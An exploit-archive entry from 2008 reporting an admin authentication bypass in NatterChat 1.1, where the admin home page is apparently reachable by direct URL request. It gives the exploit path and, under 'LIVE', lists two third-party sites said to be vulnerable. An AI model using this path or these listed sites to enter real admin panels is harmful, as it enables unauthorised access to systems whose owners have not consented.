[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : NatterChat 1.1 Remote Admin Bypass Vulnerability
# Published : 2008-11-20
# Author : Stack
# Previous Title : ToursManager (tourview.php tourid) Blind SQL Injection Vulnerability
# Next Title : VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability


==============================================================================
 NATTERCHAT v1.1  Admin Home Bypass Vulnerability
==============================================================================
 [??] Script  :          [ NATTERCHAT v1.1  ]
 [??] Discover:          [ Mountassif Moad  ]

===[ XPL ]===
 [??] http://localhost/[path]/admin/home.php
===[ LIVE ]===
 [??] http://www.welfarerights.net/natterchat/admin/home.asp
 [??] http://www.natterchat.co.uk/version11/admin/home.asp

# www.Syue.com [2008-11-20]